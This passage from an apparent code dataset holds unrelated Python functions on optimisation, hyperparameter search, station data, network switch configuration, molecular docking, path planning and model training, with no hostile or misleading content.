\",self.best.getFitness())", "def solve(self):\n while self.counter[-1] != len(self.sequences[-1]) + 1:\n basepair = self.generatebasepairs(self.counter) # Get the combination for the current coordination\n moves = self.generatemoves(basepair) # Get all possible ways to get to this current coordination\n\n maxscore = -100000000 # set the maxscore to a value which is always lower than possible scores\n bestmove = None\n\n # FOr each move calculate score\n for move in moves:\n coordinates = self.generatecoordinates(move, self.counter) # generate the origin coordinate for the current move\n score = self.retrievematrixelement(coordinates).score # Get the score at the origin coordinate\n pairs = self.getallpairs(move) # Get all pairs possible for the current move\n scores = [self.scorePair(u) for u in pairs] # Generate scores for all pairs\n newscore = score + sum(scores) # Add generated scores to origin score\n if newscore > maxscore:\n maxscore = newscore\n bestmove = coordinates\n\n self.enterelement(self.counter, Score(bestmove, maxscore))\n self.increase()", "def _choose_best_option(self):", "def _fit_multiple(self, X, y, configurations, bracket_num):\n device_used = self.device\n if device_used == 'cuda':\n device_used += f':{self.gpu_ids[bracket_num % self.n_device]}'\n list_toTrain_model = []\n best_config_by_round = []\n\n for i in tqdm(range(bracket_num + 1), desc=f'Bracket {bracket_num}', position=(self.max_rounds-bracket_num), leave=True):\n for contender in range(self.brackets[bracket_num][i]['ni']):\n self.brackets[bracket_num][i]['contenders'][contender] = dict.fromkeys([\n 'hparams', 'score'])\n self.brackets[bracket_num][i]['contenders'][contender]['hparams'] = configurations[contender]['hparams']\n model = self.create_model(\n self.estimator,\n random_state=self.random_state,\n 
epoch=self.brackets[bracket_num][i]['ri'],\n device=device_used,\n log_path=self.log_path,\n **configurations[contender]['hparams']\n )\n verbose = 0\n list_toTrain_model.append(\n (model, X, y, self.scoring, self.cv, self.n_jobs_cv, verbose))\n\n torch.multiprocessing.set_start_method('spawn', force=True)\n with MyPool(self.n_jobs_model) as p:\n list_toTrain_score = p.starmap(\n self.get_mean_cv_score, list_toTrain_model)\n\n for contender in range(self.brackets[bracket_num][i]['ni']):\n self.brackets[bracket_num][i]['contenders'][contender]['score'] = list_toTrain_score[contender]\n\n configurations = self.get_top_k(\n self.brackets[bracket_num][i]['contenders'],\n k=max(math.floor(\n self.brackets[bracket_num][i]['ni']/self.factor), 1)\n )\n\n best_config = configurations[0].copy()\n best_config_by_round.append({\n 'bracket': bracket_num,\n 'round': i,\n 'epoch': int(self.brackets[bracket_num][i]['ri']),\n **best_config\n })\n\n return best_config_by_round", "def SA(targetMDG):\n hill_climbers = []\n for i in range(NUM_Population):\n hill_climbers.append(SimulatedAnnealing(targetMDG))\n\n completed_climbers = []\n completed_max_climbers = []\n\n # k: int, number of neighbors to be considered\n k = 20\n i = 0\n not_increased = 0\n max_score = 0\n\n while True:\n for climber in hill_climbers[:]:\n result = climber.climb_with_annealing(k, i)\n if not result:\n completed_climbers.append(climber)\n hill_climbers.remove(climber)\n max_completed_climber = SimulatedAnnealing(targetMDG)\n max_completed_climber.result = climber.max_result\n max_completed_climber.update_score()\n completed_max_climbers.append(max_completed_climber)\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n print(\"Iteration \", i, \": \", total_climbers[-1].score)\n\n if total_climbers[-1].score - max_score != 0:\n not_increased = 0\n else:\n not_increased += 1\n\n if len(hill_climbers) == 0 or not_increased == 10:\n break\n i += 1\n max_score = total_climbers[-1].score\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n\n max_climber = total_climbers[-1]\n\n print(\"TurboMQ = \", max_climber.score)\n for c in max_climber.result: # print all clusters which are not singleton\n if 1 != len(c.get_nodes()):\n print(c.get_nodes())\n\n return max_climber.result", "def get_station_configuration_l(station_id, station_configuration):\n \n si = np.string_(station_id) \n \n if b':' in si:\n #si = bytes( (si.split(':')[1] , 'utf-8') )\n station_id_secondary = b'0-20000-0-' +si # remove the prefix to the station id \n else:\n for iid in b'0',b'1':\n \n station_id_primary = b'0-2000'+iid+b'-0-' +si # remove the prefix to the station id \n matching_primary_ind = np.where(station_configuration['primary_id'] == station_id_primary)[0]\n stat_conf_retrieved = station_configuration.loc[matching_primary_ind]\n if len(stat_conf_retrieved) > 0:\n return stat_conf_retrieved\n else:\n station_id_secondary=station_id_primary\n\n secondary = station_configuration['secondary_id'] \n loc=0\n for s in secondary:\n s = np.bytes_(str(s))\n try: \n if b'[' in s:\n st = s.replace(b'[',b'').replace(b']',b'')\n stl=st.split(b',')\n for st in stl:\n if si==st:\n #return loc # OLD wrong \n return station_configuration.loc[loc] # new version, might not work ???\n else:\n if si==s: \n return station_configuration.loc[loc] # new version, might not work ???\n except MemoryError:\n return 0\n loc=loc+1\n return 0", "async def spa_configured(self):\n await 
self.send_config_req()\n await self.send_panel_req(0, 1)\n # get the versions and model data\n await self.send_panel_req(2, 0)\n while True:\n if (self.connected\n and self.config_loaded\n and self.macaddr != 'Unknown'\n and self.curtemp != 0.0):\n return\n await asyncio.sleep(1)", "def get_bestPoses(self):\r\n \r\n if not \"dscores\" in self.__dict__:\r\n self.get_bestdockingscore()\r\n \r\n # define directory\r\n pr_bestPoses = pathFolder.createFolder(self.pr_out + \"BEST_POSES/\")\r\n self.pr_bestPoses = pr_bestPoses\r\n lbest_poses = []\r\n\r\n for chemID in self.dscores.keys():\r\n bestScoreDock = float(self.dscores[chemID][\"r_i_docking_score\"])\r\n bestScoreEmodel = float(self.dscores[chemID][\"r_i_glide_emodel\"])\r\n\r\n ipose = 0\r\n nbpose = len(self.cPoses.lc)\r\n while ipose < nbpose:\r\n namepose = self.cPoses.lc[ipose][\"s_m_entry_name\"]\r\n nameChem = namepose.split(\".\")[0]\r\n try:\r\n dock_score = float(self.cPoses.lc[ipose][\"r_i_docking_score\"])\r\n emodel_score = float(self.cPoses.lc[ipose][\"r_i_glide_emodel\"])\r\n except:\r\n ipose = ipose + 1\r\n continue\r\n if chemID == nameChem:\r\n if bestScoreDock == dock_score and bestScoreEmodel == emodel_score:\r\n pfilout = self.pr_bestPoses + nameChem + \".sdf\"\r\n if not path.exists(pfilout) or path.getsize(pfilout) < 20: # control if exist\r\n filout = open(pfilout, \"w\")\r\n filout.write(self.cPoses.lc[ipose][\"sdf\"])\r\n filout.close()\r\n # apply a format with babel to have a proper sdf\r\n runExternalSoft.babelConverttoSDF(pfilout)\r\n break\r\n\r\n else:\r\n lbest_poses.append(self.cPoses.lc[ipose])\r\n ipose = ipose + 1\r\n\r\n print \"NB best poses:\", len(self.cPoses.lc[ipose])", "def main(keep_best_count, mutation_factor, rounds, target, stagnate):\n ways = [range(len(DISTANCES))]\n result = {'round':0,'cost':None}\n for i in range(rounds):\n ways = mutate(ways,mutation_factor)\n best = []\n for way in ways:\n best.append((rate(way),way))\n best.sort()\n if VERBOSITY:\n for way in best:\n print way\n print \"Round %d best way is %s\" % (i+1, best[0][0])\n # break if we hit the target\n if best[0][0] <= target:\n print \"Hit Target\"\n break\n # break if we stagnate to long\n if result['cost'] is None or best[0][0] <result['cost']:\n result['cost'] = best[0][0]\n result['round'] = i+1\n elif result['round'] + stagnate <= i+1:\n print \"Stagnate to long\"\n break\n ways = list(b[1] for b in best[0:keep_best_count])\n print \"\"\n print \"best found order with cost=%d\" % best[0][0]\n print ' '.join(list(NAMES[i] for i in best[0][1]))\n print \"\"", "def WCA_SA(targetMDG, WCAresult):\n hill_climbers = []\n for i in range(NUM_Population):\n hill_climbers.append(SimulatedAnnealing(targetMDG, WCAresult))\n\n completed_climbers = []\n completed_max_climbers = []\n\n # k: int, number of neighbors to be considered\n k = 20\n i = 0\n not_increased = 0\n max_score = 0\n Temperature = 20\n\n while True:\n for climber in hill_climbers[:]:\n result = climber.climb_with_annealing(k, Temperature)\n if not result:\n completed_climbers.append(climber)\n hill_climbers.remove(climber)\n max_completed_climber = SimulatedAnnealing(targetMDG)\n max_completed_climber.result = climber.max_result\n max_completed_climber.update_score()\n completed_max_climbers.append(max_completed_climber)\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n print(\"Iteration \", i, \": \", total_climbers[-1].score)\n\n if total_climbers[-1].score - max_score != 0:\n not_increased = 0\n 
else:\n not_increased += 1\n\n if len(hill_climbers) == 0 or not_increased == 10:\n break\n i += 1\n max_score = total_climbers[-1].score\n if Temperature > 0:\n Temperature -= 0.5\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n\n max_climber = total_climbers[-1]\n\n print(\"TurboMQ = \", max_climber.score)\n for c in max_climber.result: # print all clusters which are not singleton\n if 1 != len(c.get_nodes()):\n print(c.get_nodes())\n\n max_climber.remove_empty_cluster()\n return max_climber.result", "def getNextTestCfg(self, fSkippedLast = False):\n asTestCfgCur = self.getCurrentTestCfg();\n\n asTestCfg = self.advanceTestCfg();\n while asTestCfg and self.isTestCfgBlacklisted(asTestCfg):\n asTestCfg = self.advanceTestCfg();\n\n # Compare the current and next config and close the approriate test\n # categories.\n reporter.testDone(fSkippedLast);\n if asTestCfg:\n idxSame = 0;\n while asTestCfgCur[idxSame] == asTestCfg[idxSame]:\n idxSame += 1;\n\n for i in range(idxSame, len(asTestCfg) - 1):\n reporter.testDone();\n\n for i in range(idxSame, len(asTestCfg)):\n reporter.testStart('%s' % (self.getTestIdString(asTestCfg[i], i)));\n\n else:\n # No more tests, mark all tests as done\n for i in range(0, len(asTestCfgCur) - 1):\n reporter.testDone();\n\n return asTestCfg;", "def apply_configs(task):\n\n if \"3750X\" in task.host[\"sw_model\"]:\n # run 3750X function\n aaa_3750x(task)\n\n # apply global config file for each host\n task.run(task=napalm_configure, filename=f\"configs/{task.host}_dot1x_global.txt\")\n # print completed hosts\n c_print(f\"*** {task.host}: dot1x global configuration applied ***\")\n # apply snmp config file for each host\n task.run(task=napalm_configure, filename=f\"configs/{task.host}_snmp.txt\")\n # print completed hosts\n c_print(f\"*** {task.host}: SNMP configuration applied ***\")\n # apply interface config file for each host\n task.run(task=napalm_configure, filename=f\"configs/{task.host}_dot1x_intf.txt\")\n # print completed hosts\n c_print(f\"*** {task.host}: dot1x interface configuration applied ***\")", "def intial_configuration():\n print(('You will be asked a few questions to configure latools\\n'\n 'for your specific laboratory needs.'))\n lab_name = input('What is the name of your lab? : ')\n\n params = {}\n OK = False\n while ~OK:\n srmfile = input('Where is your SRM.csv file? [blank = default] : ')\n if srmfile != '':\n if os.path.exists(srmfile):\n params['srmfile'] = srmfile\n OK = True\n else:\n print((\"You told us the SRM data file was at: \" + semfile +\n \"\\nlatools can't find that file. Please check it \"\n \"exists, and \\ncheck that the path was correct. \"\n \"The file path must be complete, not relative.\"))\n else:\n print((\"No path provided. Using default GeoRem values for \"\n \"NIST610, NIST612 and NIST614.\"))\n OK = True\n\n OK = False\n\n while ~OK:\n dataformatfile = input(('Where is your dataformat.dict file? '\n '[blank = default] : '))\n if dataformatfile != '':\n if os.path.exists(dataformatfile):\n params['srmfile'] = dataformatfile\n OK = True\n else:\n print((\"You told us the dataformat file was at: \" +\n dataformatfile + \"\\nlatools can't find that file. \"\n \"Please check it exists, and \\ncheck that the path \"\n \"was correct. The file path must be complete, not \"\n \"relative.\"))\n else:\n print((\"No path provided. 
Using default dataformat \"\n \"for the UC Davis Agilent 7700.\"))\n OK = True\n\n make_default = input(('Do you want to use these files as your '\n 'default? [Y/n] : ')).lower() != 'n'\n\n add_config(lab_name, params, make_default=make_default)\n\n print(\"\\nConfiguration set. You're good to go!\")\n\n return", "def get_config(self, **kwargs) -> Optional[Dict[str, Any]]:\n\n if self.current_individual >= len(self.current_population):\n raise Exception(\n \"It seems that some configurations are sill pending, while querying a new configuration. \"\n \"Note that NSGA-2 does not support asynchronous scheduling. To avoid this behaviour, \"\n \"make sure to set num_workers = 1.\"\n )\n else:\n individual = self.current_population[self.current_individual]\n\n self.current_individual += 1\n config = {}\n for hp_name, hp in self.config_space.items():\n if isinstance(hp, Domain):\n if isinstance(hp, FiniteRange):\n config[hp_name] = hp.values[individual.x[hp_name]]\n else:\n config[hp_name] = individual.x[hp_name]\n return config", "def test_nearest(self):\n dist = station.nearest(28.43, -81.31)\n stn = dist.pop(\"station\")\n self.assertIsInstance(stn, station.Station)\n self.assertEqual(stn.icao, \"KMCO\")\n for val in dist.values():\n self.assertIsInstance(val, float)\n for *params, count in (\n (30, -82, 10, True, True, 0.2, 1),\n (30, -82, 10, True, False, 0.2, 5),\n (30, -82, 10, False, False, 0.2, 6),\n (30, -82, 1000, True, True, 0.5, 6),\n (30, -82, 1000, False, False, 0.5, 37),\n ):\n stations = station.nearest(*params)\n self.assertEqual(len(stations), count)\n for dist in stations:\n stn = dist.pop(\"station\")\n self.assertIsInstance(stn, station.Station)\n for val in dist.values():\n self.assertIsInstance(val, float)", "def shortest_path(self):\n\t\t#dict that will hold the cost of traveling to each station\n\t\t#add the initial cost of the starting station, which is 0\n\t\tD = {0:0}\n\n\t\t#add all of our dict keys (stations) to our queue\n\t\tstation_queue = self.station_graph.keys()\n\n\t\t#sort the keys! since the graph is directed and acyclic, the stations\n\t\t#can be explored one at a time, in order, without having to adjust\n\t\t#for the lowest distance value via priority queue.\n\t\t#\n\t\t#sort them with reverse=True so that they can be popped from the\n\t\t#end of the list instead of from the beginning. This should save\n\t\t#some cpu time.\n\t\tstation_queue.sort(reverse=True)\n\t\twhile len(station_queue) > 0:\n\n\t\t\tstation = station_queue.pop() #grab the next node in the queue\n\n\t\t\tfor next_st, next_cost in self.station_graph[station].iteritems():\n\t\t\t\t#loops through the current station's neighbors, and calculates\n\t\t\t\t#their costs from the starting node, making sure to store\n\t\t\t\t#the lowest cost in our D dict\n\t\t\t\talt = D[station] + next_cost #sum the costs\n\t\t\t\tif not D.has_key(next_st) or alt < D[next_st]:\n\t\t\t\t\t#if there is no cost on record, or if the newly calculated\n\t\t\t\t\t#cost is lower than the currently recorded one, then\n\t\t\t\t\t#record the newly calculated cost as the lowest\n\t\t\t\t\tD[next_st] = alt #set the cost to get to next_st\n\n\t\treturn D[self.final_stop]", "def get_three_largest_stations_graph(filename):\n with open(filename) as f_in:\n reader = csv.DictReader(f_in)\n station = {} # This is a {station-id: station-name} dictionary. 
It is more efficient by using id.\n start_station_number = {} # This is a {station-id: number of connections} dictionary.\n start_station_route = {} # This is a {start-id: {end_id: number of connections}} dictionary.\n\n largest_station_id = 0\n largest_station_times = 0\n second_largest_station_id = 0\n second_largest_station_times = 0\n third_largest_station_id = 0\n third_largest_station_times = 0\n for row in reader:\n start_id = row['start station id']\n end_id = row['end station id']\n if station.get(start_id) is None:\n station[start_id] = row['start station name']\n if station.get(end_id) is None:\n station[end_id] = row['start station name']\n if start_station_route.get(start_id) is None:\n start_station_route[start_id] = {}\n start_station_route[start_id][end_id] = 1\n start_station_number[start_id] = 1\n else:\n start_station_number[start_id] += 1\n if start_station_route[start_id].get(end_id) is None:\n start_station_route[start_id][end_id] = 1\n else:\n start_station_route[start_id][end_id] += 1\n\n times = start_station_number[start_id]\n if times > third_largest_station_times:\n if times >= second_largest_station_times:\n if times >= largest_station_times:\n # If this one is the largest one, only adding the largest by one\n if start_id != largest_station_id:\n third_largest_station_id = second_largest_station_id\n third_largest_station_times = second_largest_station_times\n second_largest_station_id = largest_station_id\n second_largest_station_times = largest_station_times\n largest_station_id = start_id\n largest_station_times += 1\n else:\n # If this one is the second largest one, only adding the second largest by one\n if start_id != second_largest_station_id:\n third_largest_station_id = second_largest_station_id\n third_largest_station_times = second_largest_station_times\n second_largest_station_id = start_id\n second_largest_station_times = times\n else:\n third_largest_station_id = start_id\n third_largest_station_times = times\n\n # print the largest three stations information\n largest_station = station[largest_station_id]\n second_largest_station = station[second_largest_station_id]\n third_largest_station = station[third_largest_station_id]\n print(\"The largest three stations in NYC are {}, {}, and {}.\"\n .format(largest_station, second_largest_station, third_largest_station))\n print(\"{} has {} connections with {} stations.\".\n format(largest_station, largest_station_times, len(start_station_route[largest_station_id])))\n print(\"{} has {} connections with {} stations.\".\n format(second_largest_station, second_largest_station_times,\n len(start_station_route[second_largest_station_id])))\n print(\"{} has {} connections with {} stations.\".\n format(third_largest_station, third_largest_station_times,\n len(start_station_route[third_largest_station_id])))\n\n # sort the station_route by numbers of connections and get the first ten start-end connections\n largest_station_graph = get_station_graph(largest_station_id,\n sort_end_station_list(start_station_route[largest_station_id]))\n second_largest_station_graph = get_station_graph(second_largest_station_id, sort_end_station_list(\n start_station_route[second_largest_station_id]))\n third_largest_station_graph = get_station_graph(third_largest_station_id, sort_end_station_list(\n start_station_route[third_largest_station_id]))\n\n # convert the station-id back to station-name\n largest_station_graph = get_station_name(largest_station_graph, station)\n second_largest_station_graph = 
get_station_name(second_largest_station_graph, station)\n third_largest_station_graph = get_station_name(third_largest_station_graph, station)\n\n return largest_station_graph, second_largest_station_graph, third_largest_station_graph", "def on_game_start(self, config):\n gamelib.debug_write('Configuring your custom algo strategy...')\n self.config = config\n global FILTER, ENCRYPTOR, DESTRUCTOR, PING, EMP, SCRAMBLER\n FILTER = config[\"unitInformation\"][0][\"shorthand\"]\n ENCRYPTOR = config[\"unitInformation\"][1][\"shorthand\"]\n DESTRUCTOR = config[\"unitInformation\"][2][\"shorthand\"]\n PING = config[\"unitInformation\"][3][\"shorthand\"]\n EMP = config[\"unitInformation\"][4][\"shorthand\"]\n SCRAMBLER = config[\"unitInformation\"][5][\"shorthand\"]\n self.structureInPlace = False\n self.destructorsLeft = 0\n self.destructorsMiddle = 0\n self.juicyTargets = 0\n self.juicyCorner = False\n self.floodGatesOpen = True\n self.defenseRating = 0\n self.defenseCost = 0\n self.attackedFromLeft = 0\n\n self.mainStructure = [[ 25, 13],[ 24, 12],[ 23, 11],[ 22, 10],[ 21, 9],[ 20, 8],[ 19, 7],[ 18, 6],[ 17, 5],[ 16, 4],[ 15, 3],[ 14, 2],[ 13, 1]]\n\n\n self.filter0 =[[ 0, 13],[ 1, 13],[ 2, 13],[ 3, 13],[ 4, 13],[ 5, 13],[ 6, 13],[ 7, 13],[ 8, 13],\\\n [ 9, 13],[ 10, 13],[ 17, 13],[ 18, 13],[ 19, 13],[ 20, 13],[ 21, 13],[ 22, 13],[ 23, 13],[ 24, 13],[ 25, 13],[ 26, 13],[ 27, 13]] \n self.filter1 = [[ 0, 13],[ 1, 13],[ 2, 13],[ 3, 13],[ 4, 13],[ 5, 13],[ 6, 13],[ 7, 13],[ 8, 13],[ 9, 13],[ 10, 13],[ 17, 13],\\\n [ 18, 13],[ 19, 13],[ 20, 13],[ 21, 13],[ 22, 13],[ 23, 13],[ 24, 13],[ 25, 13],[ 26, 13],[ 27, 13],[ 2, 12],[ 25, 12],[ 3, 11],[ 24, 11],[ 4, 10]]\n self.filter2 = [[ 0, 13],[ 1, 13],[ 2, 13],[ 3, 13],[ 4, 13],[ 5, 13],[ 6, 13],[ 7, 13],[ 8, 13],[ 9, 13],[ 10, 13],[ 17, 13],\\\n [ 18, 13],[ 19, 13],[ 20, 13],[ 21, 13],[ 22, 13],[ 23, 13],[ 24, 13],[ 25, 13],[ 26, 13],[ 27, 13],[ 2, 12],[ 25, 12],[ 3, 11],[ 24, 11],[ 4, 10]]\n self.filter3 = [[ 4, 13],[ 5, 13],[ 6, 13],[ 7, 13]]\n\n self.destructor0 = [[ 13, 13]]\n self.destructor1 = [[ 13, 13],[ 14, 13]]\n self.destructor2 = [[ 13, 13],[ 14, 13]]\n self.destructor3 = [[ 13, 13],[ 14, 13]]\n\n self.initExclusionList = [[0,0]]\n self.exclusionList = [[0,0]]", "def perform_trials(self, evolver: 'Evolver'):\r\n\r\n approach_ind = evolver.approach[0]\r\n\r\n approach_params = evolver.approach_params.copy()\r\n approach_params[self.evolve_param.name] = self.checking\r\n\r\n sens_params = self.new_sensitives.copy()\r\n sens_params[self.sensitive[1].name] = self.sens_checking\r\n\r\n trial_best = float('-inf')\r\n trial_patience = evolver.settings.trial_patience\r\n trial_epsilon = evolver.settings.trial_epsilon\r\n trial_patience_used = 0\r\n trial_index = 0\r\n\r\n if self.sensitive[1].categorical:\r\n metric_store = self.sens_sweep[self.sens_checking]\r\n else:\r\n evolver.logger.debug('sens_sweep_pts=%s, sens_sweep_len=%s, sens_checking=%s', self.sens_sweep_pts, self.sens_sweep_len, self.sens_checking)\r\n insert_ind = (\r\n np.searchsorted(self.sens_sweep_pts[:self.sens_sweep_len], self.sens_checking)\r\n if self.sens_sweep_len > 0\r\n else 0\r\n )\r\n assert isinstance(insert_ind, (int, np.int32, np.int64)), f'insert_ind={insert_ind}, type(insert_ind)={type(insert_ind)}'\r\n if insert_ind < self.sens_sweep_len:\r\n self.sens_sweep_pts[insert_ind+1:self.sens_sweep_len+1] = (\r\n self.sens_sweep_pts[insert_ind:self.sens_sweep_len])\r\n self.sens_sweep_pts[insert_ind] = self.sens_checking\r\n\r\n 
self.sens_sweep[insert_ind+1:self.sens_sweep_len+1] = (\r\n self.sens_sweep[insert_ind:self.sens_sweep_len])\r\n self.sens_sweep[insert_ind, :] = 0\r\n else:\r\n self.sens_sweep_pts[insert_ind] = self.sens_checking\r\n metric_store = self.sens_sweep[insert_ind]\r\n\r\n while (trial_index < evolver.settings.max_trials\r\n and trial_patience_used < trial_patience):\r\n for worker in evolver.workers:\r\n worker.job_queue.put((approach_ind, approach_params.copy(), sens_params.copy()))\r\n evolver.logger.debug('dispatched jobs')\r\n\r\n for worker in evolver.workers:\r\n while True:\r\n try:\r\n result = worker.result_queue.get()\r\n break\r\n except InterruptedError:\r\n evolver.logger.critical('result_queue.get() was interrupted')\r\n\r\n if trial_index == evolver.settings.max_trials:\r\n continue\r\n result_metric = result[evolver.settings.metric_name]\r\n metric_store[trial_index] = result_metric\r\n trial_index += 1\r\n\r\n if result_metric - trial_epsilon > trial_best:\r\n evolver.logger.debug('got trial metric %s (improved old: %s)', result_metric, trial_best)\r\n trial_best = result_metric\r\n if trial_patience_used < trial_patience:\r\n trial_patience_used = 0\r\n elif trial_patience_used < trial_patience:\r\n trial_patience_used += 1\r\n evolver.logger.debug('got trial metric %s, exhausted patience %s/%s',\r\n result_metric, trial_patience_used, trial_patience)\r\n else:\r\n evolver.logger.debug('got trial metric %s (worse, but already out of patience)', result_metric)", "def find_alt_assignments(self, N=1, by_ss=True, verbose=False):\n \n obs = self.obs\n preds = self.preds\n log_prob_matrix = self.log_prob_matrix\n #best_match_indexes = self.best_match_indexes\n best_matching = self.assign_df.loc[:,[\"SS_name\",\"Res_name\"]]\n best_matching.index = best_matching[\"SS_name\"]\n alt_matching = None\n \n # Calculate sum probability for the best matching\n best_sum_prob = sum(log_prob_matrix.lookup(\n best_matching[\"SS_name\"], best_matching[\"Res_name\"]))\n \n # Calculate the value used to penalise the best match for each residue\n penalty = 2*log_prob_matrix.min().min() \n logging.debug(\"Penalty value: %f\", penalty)\n \n # Initialise DataFrame for storing alt_assignments\n alt_matching_all = best_matching.copy()\n alt_matching_all[\"Rank\"] = 1\n alt_matching_all[\"Rel_prob\"] = 0\n \n \n for i in best_matching.index: # Consider each spin system in turn\n ss = best_matching.loc[i, \"SS_name\"]\n res = best_matching.loc[i, \"Res_name\"]\n logging.debug(\"Finding alt assignments for original match %s - %s\", ss, res)\n if verbose: print(ss, res)\n \n excluded = best_matching.loc[[i], :]\n \n for j in range(N):\n alt_matching = self.find_best_assignment2(exc=excluded)\n \n alt_matching[\"Rank\"] = j+2\n alt_sum_prob = sum(self.log_prob_matrix.lookup(\n alt_matching[\"SS_name\"], alt_matching[\"Res_name\"]))\n alt_matching[\"Rel_prob\"] = alt_sum_prob - best_sum_prob\n \n \n # Add the alt match for this ss or res to the results dataframe \n # and also the excluded dataframe.\n if by_ss:\n alt_matching_all = alt_matching_all.append(\n alt_matching.loc[alt_matching[\"SS_name\"]==ss, :], \n ignore_index=True)\n res = alt_matching.loc[alt_matching[\"SS_name\"]==ss, \n \"Res_name\"].tolist()[0]\n # The .tolist()[0] is to convert a single-item series into a string.\n else:\n alt_matching_all = alt_matching_all.append(\n alt_matching.loc[alt_matching[\"Res_name\"]==res, :], \n ignore_index=True)\n ss = alt_matching.loc[alt_matching[\"Res_name\"]==res, \n \"SS_name\"].tolist()[0]\n excluded 
= excluded.append(pd.DataFrame({\"SS_name\":[ss],\"Res_name\":[res]}), \n ignore_index=True)\n \n self.alt_assign_df = self.make_assign_df(alt_matching_all)\n if by_ss:\n self.alt_assign_df = self.alt_assign_df.sort_values(\n by=[\"SS_name\", \"Rank\"])\n else:\n self.alt_assign_df = self.alt_assign_df.sort_values(\n by=[\"Res_name\", \"Rank\"])\n \n return(self.alt_assign_df)", "def _default_config(self):\n return {\n 'penalty': 'l1',\n 'solver': 'liblinear'\n }", "def rrt_search(self):\n self.tree.AddVertex(self.start_config)\n self.tree.AddEdge(self.start_config, self.start_config)\n\n while True:\n x_new, x_nearest = self.new_and_near()\n if x_new is None:\n # print(\"it's None\")\n continue\n # connect shortest valid edge\n # print(\"new point\", x_new)\n self.connect_to_point(x_nearest, x_new)\n\n # probabilistically check if solution found\n if self.goal_config in self.tree.vertices:\n print(\"find it\")\n path = self.planning_env.reconstruct_path(self.tree.edges, self.start_config, self.goal_config)\n if path is not None:\n return path\n\n if self.name=='rrtstar' and self.tree.samples_taken > 10:\n return []\n # # check if can connect to goal after generating max_samples\n if self.tree.samples_taken >= self.tree.max_samples:\n return []", "def train_a_config_return_a_model(trial,optimsetting,szshuf_setng):\n noepoch = trial[0]\n nolayer = trial[1]\n nonodes = trial[2]\n optmfunc = optimsetting\n\n btchsize = szshuf_setng[0]\n shufBOOL = szshuf_setng[1]\n\n curr_model, curr_info = config_new_model(nolayer,nonodes)\n # technially, it doesn't matter what the optimization function is.\n # we can just pass it through directly.\n # what needs to change is how we fit the model\n curr_model.compile(optimizer=optmfunc, loss=\"mse\")\n\n print(\"Within train_a_config. 
Prepping to train:\")\n print(\"\\t{} {} {}\".format(optmfunc,btchsize,shufBOOL))\n # now we fit appropriately.\n # we set batch_size and shuffle\n # defaults are 32 and True\n # we will also try 1 and False\n trn_model = curr_model.fit(Z_train, y_train,\n validation_data=(Z_validation,y_validation),\n epochs=noepoch, verbose=0,\n batch_size=btchsize,\n shuffle=shufBOOL)\n \n ret_dict = {\"epochs\":trn_model.epoch[-1]+1,\n \"config\":curr_info,\n \"result\":trn_model.history,\n \"setngs\":{\"optimization\":optmfunc},\n \"compil\":{\"batchsize\":btchsize,\n \"shuffled\":shufBOOL}}\n return ret_dict, trn_model", "def improve(self):\n tour = Tour(self.heuristic_path)\n\n # Find all valid 2-opt moves and try them\n for t1 in self.heuristic_path:\n around = tour.around(t1)\n\n for t2 in around:\n broken = set([makePair(t1, t2)])\n # Initial savings\n gain = TSP.dist(t1, t2)\n\n close = self.closest(t2, tour, gain, broken, set())\n\n # Number of neighbours to try\n tries = 5\n\n for t3, (_, Gi) in close:\n # Make sure that the new node is none of t_1's neighbours\n # so it does not belong to the tour.\n if t3 in around:\n continue\n\n joined = set([makePair(t2, t3)])\n\n # The positive Gi is taken care of by `closest()`\n Log.debug(\"Start: X: {} - Y: {} = {}\".format((t1, t2),\n (t2, t3), Gi))\n\n if self.chooseX(tour, t1, t3, Gi, broken, joined):\n # Return to Step 2, that is the initial loop\n return True\n # Else try the other options\n\n tries -= 1\n # Explored enough nodes, change t_2\n if tries == 0:\n break\n\n return False", "def get_config(seed, shot):\n if args.coco:\n # COCO\n assert args.two_stage, 'Only supports novel weights for COCO now'\n\n if args.novel_finetune:\n # Fine-tune novel classifier\n ITERS = {\n 1: (10000, 500),\n 2: (10000, 1500),\n 3: (10000, 1500),\n 5: (10000, 1500),\n 10: (10000, 2000),\n 30: (10000, 6000),\n }\n mode = 'novel'\n\n assert not args.fc and not args.unfreeze\n else:\n # Fine-tune entire classifier\n ITERS = {\n 1: (14400, 16000),\n 2: (28800, 32000),\n 3: (43200, 48000),\n 5: (72000, 80000),\n 10: (144000, 160000),\n 30: (216000, 240000),\n }\n mode = 'all'\n split = temp_split = ''\n temp_mode = mode\n\n config_dir = 'configs/COCO-detection'\n ckpt_dir = 'checkpoints/coco/faster_rcnn'\n base_cfg = '../../Base-RCNN-FPN.yaml'\n else:\n # PASCAL VOC\n assert not args.two_stage, 'Only supports random weights for PASCAL now'\n\n ITERS = {\n 1: (3500, 4000),\n 2: (7000, 8000),\n 3: (10500, 12000),\n 5: (17500, 20000),\n 10: (35000, 40000),\n }\n split = 'split{}'.format(args.split)\n mode = 'all{}'.format(args.split)\n # temp_split = 'split1'\n # temp_mode = 'all1'\n temp_split=split\n temp_mode = mode\n\n config_dir = 'configs/PascalVOC-detection'\n ckpt_dir = 'checkpoints/voc/faster_rcnn'\n base_cfg = '../../../Base-RCNN-FPN.yaml'\n\n seed_str = 'seed{}'.format(seed) if seed != 0 else ''\n fc = '_fc' if args.fc else ''\n unfreeze = '_unfreeze' if args.unfreeze else ''\n # Read an example config file for the config parameters\n temp = os.path.join(\n temp_split, 'faster_rcnn_R_101_FPN_ft{}_{}_1shot{}'.format(\n fc, temp_mode, unfreeze)\n )\n print('temp_file:', temp)\n config = os.path.join(args.root, config_dir, temp + '.yaml')\n print('config_file:', config)\n\n prefix = 'faster_rcnn_R_101_FPN_ft{}_{}_{}shot{}{}'.format(\n fc, mode, shot, unfreeze, args.suffix)\n print('prefix_file:', prefix)\n\n output_dir = os.path.join(args.root, ckpt_dir, seed_str)\n print('output_dir',output_dir)\n os.makedirs(output_dir, exist_ok=True)\n \n save_dir = 
